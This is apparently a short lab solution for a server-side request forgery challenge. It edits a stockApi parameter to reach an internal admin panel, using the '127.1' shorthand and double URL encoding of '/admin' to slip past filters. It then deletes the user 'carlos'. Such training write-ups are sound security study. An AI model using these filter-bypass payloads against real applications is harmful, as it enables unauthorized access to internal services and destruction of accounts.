Solution:

• Trun on Burpsuite, access the lab go to the product section then stock check .
• From Burp history send it to repeter.
• Change the stcokApi=http://localhost

(It Blocks So we have to change it like 127.0.0.1, but it also blocked so we use 127.1 → it works)

• Now go do /admin ( it also blocks so we have to double url encode )

stockApi=http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65

• In below in response see:

href="/admin/delete?username=carlos

• Now change it to:

stockApi=http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65/delete?username=carlos

Lab Solved.